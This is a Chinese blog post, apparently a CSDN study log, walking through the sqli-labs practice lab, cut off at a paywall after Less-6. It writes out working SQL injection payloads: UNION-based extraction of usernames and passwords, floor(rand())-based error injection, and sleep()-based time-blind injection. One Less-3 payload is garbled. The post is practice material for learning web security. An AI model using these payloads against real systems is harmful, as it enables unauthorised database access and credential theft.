本文详细记录了作者通过sqli-labs的各个挑战,涵盖了各种SQL注入技术,包括基于错误的单引号、双引号、整型、GET、POST等多种注入方法,以及盲注、堆叠注入、双注入等复杂情况,同时涉及了报错注入、时间延迟注入和布尔型盲注等技巧,是SQL注入学习的实战总结。
sqli-lab通关记录
docker搭建
运行:docker info //查看docker信息,确认docker正常
搜索sqli-labs:docker search sqli-labs
建立镜像:docker pull acgpiano/sqli-labs
查看存在的镜像:docker images
运行存在的镜像:docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs (参数解释:-dt 后台运行; --name 命名;-p 80:80 将后面的docker容器端口映射到前面的主机端口)
docker ps -a 显示容器container容器的id image 命令 端口等信息
使用命令 docker container ls 查看已经启动的容器列表
sqli-labs通关记录
- Page-1(Basic Challenges)
-
- Less-1 基于错误的单引号字符串
- Less-2 基于错误的get整型注入
- Less-3 基于错误的get单引号变形字符型注入
- Less-4 基于错误的GET双引号字符型注入
- Less-5 双注入GET单引号字符型注入
- Less-6 双注入GET双引号字符型注入
- Less-7 导出文件GET字符型注入
- Less-8 布尔型单引号GET盲注
- Less-9 基于时间的GET单引号盲注
- Less-10 基于时间的双引号盲注
- Less-11 基于错误的PSOT单引号字符
- Less-12 基于错误的双引号POST型字符变形注入
- Less-13 POST 单引号变形双注入
- Less-14 POST双引号变形双注入
- Less-15 基于bool型/时间延迟单引号POST型盲注
- Less-16 post方法双引号括号绕过时间盲
- Less-17 基于错误的更新查询POST注入
- Less-18 基于错误的用户代理,头部POST注入
- Less-19 基于头部的RefererPOST报错注入
- Less-20 基于错误的cookie头部POST注入
- Page-2 (Adv Injections)
-
- Less-21 Cookie Injection- Error Based- complex - string ( 基于错误的复杂的字符型Cookie注入)
- Less-22 Cookie Injection- Error Based- Double Quotes - string (基于错误的双引号字符型Cookie注入)
- Less-23 GET - Error based - strip comments (基于错误的,过滤注释的GET型)
- Less - 24 Second Degree Injections *Real treat* -Store Injections (二次注入)
- Less-25 Trick with OR & AND (过滤了or和and)
- Less-25a
- Less-26 Trick with comments and space (过滤了注释和空格的注入)
- less 26a GET - Blind Based - All your SPACES and COMMENTS belong to us(过滤了空格和注释的盲注)
- less 27 GET - Error Based- All your UNION & SELECT belong to us (过滤了union和select的)
- less 27a GET - Blind Based- All your UNION & SELECT belong to us
- less 28 GET - Error Based- All your UNION & SELECT belong to us String-Single quote with parenthesis基于错误的,有括号的单引号字符型,过滤了union和select等的注入
- less 28a GET - Bind Based- All your UNION & SELECT belong to us String-Single quote with parenthesis基于盲注的,有括号的单引号字符型,过滤了union和select等的注入
- Less-29 基于WAF的一个错误
- Less-30 Get-Blind Havaing with WAF
- Less-31 Protection with WAF
- Less-32 Bypass addslashes()
- Less-33 Bypass addslashes()
- Less-34 Bypass Add SLASHES
- Less-35 why care for addslashes()
- Less-36 Bypass MySQL Real Escape String
- Less-37- MySQL_real_escape_string
- Page-3 (Stacked Injections)
-
- Less-38GET- Stacked Query Injection - String
- Less-39GET- Stacked Query Injection - Intiger based
- Less-40GET - BLIND based - String - Stacked
- Less-41GET-BLIND based - Intiger - Stacked
- Less-42POST - Error based String Stacked
- Less-43POST - Error based - String - Stacked with twist
- Less-44POST - Error based String Stacked -Blind
- Less-45 POST - Error based - String - Stacked - Blind
- Less-46 GET-Error based . Numeric . ORDER BY CLAUSE
- Less-47GET-Error based - String - ORDER BY CLAUSE
- Less-48GET - Error based - Blind- Numeric- ORDER BY CLAUSE
- Less-49GET - Error based . String- Blind . ORDER BY CLAUSE
- Less-50GET - Error based - ORDER BY CLAUSE -numeric- Stacked injection
- Less-51GET - Error based - ORDER BY CLAUSE -String- Stacked Injection
- Less-52GET - Blind based - ORDER BY CLAUSE -numeric- Stacked injection
- Less-53GET - GET - Blind based - ORDER BY CLAUSE -String- stacked injection
- Page-4 (Challenges)
-
- Less-54GET - challenge - Union- 10 queries allowed - Variation 1
- Less-55GET - challenge - Union- 14 queries allowed - Variation 2
- Less-56GET - challenge - Union- 14 queries allowed -variation 3
- Less-57GET - challenge - Union- 14 queries allowed - Variation 4
- Less-58GET - challenge - Double Query- 5 queries allowed - Variation 1
- Less-59GET - challenge - Double Query- 5 queries allowed - Variation 2
- Less-60GET - challenge - Double Query- 5 queries allowed - Variation 3
- Less-61GET - challenge - Double Query- 5 queries allowed - Variation 4
- Less-62GET - challenge - Blind - 130 queries allowed - variation 1
- Less-63GET - challenge - Blind - 130 queries allowed -Variation 2
- Less-64GET - challenge - Blind - 130 queries allowed - variation 3
- Less-65GET - challenge - Blind - 130 queries allowed - Variation 4
- OVER
Page-1(Basic Challenges)
Less-1 基于错误的单引号字符串
/?id=1
正常访问
/?id=1’
返回报错信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
使用–+绕过
/?id=1’ --+
判断字段数
?id=1’ order by 4 --+
发现order by 3 回显正常,order by 4时报错,说明只有3个字段
判断注入点
?id=1’ and 1=2 union select 1,2,3 --+
发现2,3处可注入
?id=1’ and 1=2 union select 1,database(),3 --+
得到数据库security
查找数据库security中的表
?id=1' and 1=2 union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
查找表users中的列名
?id=1' and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') --+
爆破用户名和密码
?id=1' and 1=2 union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+
Less-2 基于错误的get整型注入
?id=1‘ --+报错
然后进行同less-1操作
?id=1 and 1=2 union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users)
Less-3 基于错误的get单引号变形字符型注入
?id=1’ --+报错
使用’) --+来闭合
如less-1查询字段,表名,列名
?id=1') order by 4--+
依然是只有三个字段
?id=1') and 1=2 union select 1,2,3 --+
查回显
?id=1' )and 1=2 union select 1,database(),3--+
查询数据库
?id=1' )and 1=2 union select 1,database(),and 1=2 union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
查security中的表
?id=1' )and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') --+
查user表中的列
?id=1' )and 1=2 union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+
爆破
Less-4 基于错误的GET双引号字符型注入
双引号报错
?id=1") --+回显正常
其余操作同上
Less-5 双注入GET单引号字符型注入
使用concat聚合函数
参考资料:http://www.2cto.com/article/201303/192718.html
简单的说,使用聚合函数进行双注入查询时,会在错误信息中显示一部分错误信息。
比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来。
双注: 当查询语句的前面出现聚合函数 就是多个返回结果count()就是多行的意思 后面的查询结果代码会以错误的形式显示出来
?id=1' order by 4--+
判断字段数
1' union all select count(*),2,concat( '~',(select schema_name from information_schema.schemata limit 4,1),'~',floor(rand()*2)) as a from information_schema.schemata group by a %23
获取数据库 security 这里使用union all
1' union all select count(*),2,concat( '~',(select table_name from information_schema.tables where table_schema = 'security' limit 3,1),'~',floor(rand()*2)) as a from information_schema.schemata group by a %23
获取表 users
1' union all select count(*),1,concat( '~',(select column_name from information_schema.columns where table_name= 'users' limit 2,1),'~',floor(rand()*2)) as a from information_schema.schemata group by a %23
爆出了三个字段,字段不存在也是返回you are in…
1' union all select count(*),1,concat( '~',(select concat(id,username,password) from users limit 2,1),'~',floor(rand()*2)) as a from information_schema.schemata group by a %23
成功
时间延迟型手工注入:(手工测试比较麻烦,建议使用sqlmap)
正确会延迟,错误没有延迟
爆库长
?id=1' and if(length(database())=8,sleep(5),1)--+
明显延迟,数据库长度为8
爆库名
?id=1' and if(left(database(),1)='s',sleep(5),1)--+
明显延迟,数据库第一个字符为s,然后增加left(database(),字符长度)中的字符长度,等号右边以此爆破下一个字符,正确时会延迟。最终爆破得到left(database(),8)=‘security’
爆表名
?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' ,sleep(5),1)--+
改变limit _,1 的数值的出表名users
爆列名
?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(5),1)--+
爆破值
?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+
?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+
Less-6 双注入GET双引号字符型注入
法一:报错注入(转载)
何为报错注入:
报错注入就是通过人为的引起数据库的报错,但是数据库在报错的同时会将查询的结果也呈现在报错中,我在这里介绍一下报错注入以及原理
这是网上使用最广泛的一句报错注入语句:
select count(*),(floor(rand(0)2))x from information_schema.tables group by x;
那么必须是要按这个句子来执行吗,或者必须要这些句子吗?
通过查找很多网站的资料,我总结出:
group by,rand(),floor()三个函数是必须存在的,缺一不可,并且rand()
最低0.47元/天 解锁文章
681
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
